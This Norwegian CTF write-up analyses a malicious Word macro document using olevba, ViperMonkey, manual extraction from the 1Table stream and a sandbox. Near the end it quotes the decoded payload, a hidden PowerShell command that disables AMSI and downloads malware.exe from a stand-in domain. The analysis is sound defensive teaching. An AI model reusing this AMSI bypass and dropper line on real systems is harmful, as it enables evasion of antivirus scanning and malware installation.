## Writeup: Kraftskall

### Oppgavetekst og hint
![Enda en bruker har sendt en forespørsel. Det er kommet inn et nytt dokument som vedlegg til en e-post. Brukeren skryter av at sikkerhet på e-post er enkelt, og at både mail-headers eller innholdet i e-posten virker å være normalt. Det kan virke som denne brukeren har hatt kursing på e-post sikkerhet. Brukeren sier også at det er sjekket etter lenker som kan virke mistenkelige i e-posten, og det er det ikke. Siden e-posten er åpnet, og virker OK så lurer brukeren på om det er trygt å åpne dokumentet. Kan du finne ut om det er trygt å åpne dette? OBS: Samme advarsel (og passord) som forrige oppgave. Lever EGG{32-byte hex}](imgs/reg_bibl_1.png "Enda en bruker har sendt en forespørsel. Det er kommet inn et nytt dokument som vedlegg til en e-post. Brukeren skryter av at sikkerhet på e-post er enkelt, og at både mail-headers eller innholdet i e-posten virker å være normalt. Det kan virke som denne brukeren har hatt kursing på e-post sikkerhet. Brukeren sier også at det er sjekket etter lenker som kan virke mistenkelige i e-posten, og det er det ikke. Siden e-posten er åpnet, og virker OK så lurer brukeren på om det er trygt å åpne dokumentet. Kan du finne ut om det er trygt å åpne dette? OBS: Samme advarsel (og passord) som forrige oppgave. Lever EGG{32-byte hex}")  
Etter to dager ble også hint for kraftskall lagt ut.  
![Hint: Algoritmen er enkel, men hvilken tabell ligger strengen i?](imgs/reg_bibl_2.png "Hint: Algoritmen er enkel, men hvilken tabell ligger strengen i?")  

### Analytiker-løsning(er)
1. Kjører file for å sjekke filtype.
> brukernavn@maskinnavn:~/filsti/$ file Your_Receipt_1146.doc 
Your_Receipt_1146.doc: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: Harold, Template: Normal.dotm, Last Saved By: Harold Harepus, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Mar 24 23:49:00 2020, Last Saved Time/Date: Tue Mar 24 23:49:00 2020, Number of Pages: 1, Number of Words: 0, Number of Characters: 3, Security: 0


 Vi ser at dette er et composite document, samt noe metadata om hvem som har laget det, editert det sist etc. Det meste av denne metadataen er sannsynligvis forfalsket om dette er et faktisk maldoc. (Spoiler alert: mesteparten er forfalsket)

2. Vi bruker deretter olevba fra [oletools](https://github.com/decalage2/oletools) for å sjekke etter macroer siden det har vært standard skadevarelevering i maldocs (som ikke er av typen RTF...) en god stund. Her brukes olevba med -c flagget for å bare dumpe ut macro-kildekoden.
![Resultat av olveba mot fil](imgs/2020-04-16_12-47.png "Resultat av olveba mot fil")

3. Vi lager et kjapt script for å sjekke hva resultatet av U_OW(J_NC) blir. (Selvsagt i python...)
 ![Kjapt pythonskript for å dekode strengen](imgs/2020-04-16_21-58.png "Kjapt pythonskript for å dekode strengen")
 ![Strenger dekodes til Wscript.Shell, ikke direkte sjokkerende siden maldocet må skaffe eksekvering på en eller annen måte](2020-04-16_21-58_1.png "Strenger dekodes til Wscript.Shell, ikke direkte sjokkerende siden maldocet må skaffe eksekvering på en eller annen måte")
 

 Vi ser at strengen dekodes til Wscript.Shell, altså en måte å skaffe eksekvering på. Men vi mangler enda hva som skal eksekveres. 

Som man kan se er ikke variabel J_QX definert noen plass i makrooutput fra olevba. Det er logisk å anta at den er definert i word-dokumentet et sted, og at det er denne som inneholder det vi er ute etter. Siden den også kjøres gjennom U_OW kan man også anta at den har samme format som J_NC.

Herfra kan man velge tre analyseretninger:
* [Verktøybasert analyse ](#tools) 
* [Manuell analyse](#mauelt)
* [Dynamisk analyse](#tutogkjor)

#### Verktøybasert analyse <a name="tools"></a>
 ´Storebroren´ til oletools er [vipermonkey](https://github.com/decalage2/ViperMonkey)
 Denne simulerer VBA-eksekvering via python. Vipermonkey er litt som magi, enten fungerer det veldig bra og spytter ut "svaret" direkte. Eller så feiler det hardt, uten at resultatet er særlig nyttig.
 ![Løst via Vipermonkey](imgs/vmonkey_2.png "Løst via Vipermonkey")
#### Manuell analyse <a name="manuelt"></a>
Vi begynner med å "pakke" ut dokumentet. Alle word dokument er bygd opp som zip-arkiv, og 7z håndterer unzip av de fint. Vi lager en mappe for å lagre filene (unzip), og bruker x for å pakke med mappestruktur intakt.
![Resultat av å unzippe en word-fil](imgs/2020-04-16_21-18.png "Resultat av å unzippe en word-fil")

Deretter sjekker vi gjennom filene etter variabelnavnet vårt, eventuelt en streng som ser ut som den er bygd opp på sammen måte som J_NC. Merk at her kjøres strings med ´-e b´ for å få strings i wide format. (Dvs strings lagret over 2 bytes.) Kjører man vanlig strings leter den bare etter 1-bytes strenger. (Noe som fortsatt produserer mye resultat, bare ikke hva vi er ute etter.)
![Wide strenger i 1Table](imgs/2020-04-16_21-45.png "Wide strenger i 1Table")
> Obs: I dette tilfellet misser strings første ´1-tall´ fra J_QX. Dette oppdages enkelt ved at resultatet av dekoding blir uleselig, eller ved at lengden ikke går opp i 3. 

Etter å ha fikset J_QX og lagt den inn i skript får vi ut payloaden til maldocen, inlkudert EGGet.
![Maldoc payload](imgs/2020-04-16_22-11.png "Maldoc payload")

#### Dynamisk analyse <a name="tutogkjor"></a>
 Man kan kjøre maldocen i en sandbox. F.eks [app.any.run](https://app.any.run/tasks/3e65e6a3-f9f3-4791-961e-43866f027c70/). 
 > En viktig ting å huske på her er at online gratise sandboxer ofte er åpent tilgjengelige for alle. Denne analysen her ble lastet opp av en deltaker under CTFen. Dette er kanskje ikke kritisk om det bare er snakk om en CTF, men dette er en potensiel OPSEC-lekasje. Det finnes selvsagt også sanbokser hvor man betaler for tilgang og analysene IKKE er åpne for alle. Eller man kan sette opp en egen skadevare-lab og kjøre ting i.  
 Åpner man commandolinjedelen av fra app.any.run ser man følgende:  
 ´powershell.exe -WindowStyle Hidden -noprofile [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true); If (test-path $env:APPDATA + '\C:\Windows\System32\calc.exe') {Remove-Item $env:APPDATA + '\C:\Windows\System32\calc.exe'}; $OEKQD = New-Object System.Net.WebClient; $OEKQD.Headers['User-Agent'] = '**EGG{adfcfdb9ef305f26ab51303294da6afc }**'; $OEKQD.DownloadFile('https://even_more_shady.looking.domain.lab/to/get/some/malware.exe', $env:APPDATA + '\C:\Windows\System32\calc.exe'); Stop-Process -Id $Pid -Force´

 Andre potensielle fallgruver ved å eksekvere er:
 * Om man ikke har satt opp sandboksen riktig risikerer man at aktøren oppdager at noen analyserer skadevaren, noe som kan være problematisk om det er snakk om en målrettet angriper.
 * Om man ikke har en bra avgrenset sandkasse risikerer man å infisere seg selv. Noe som generelt er en dårlig ide...
 
 
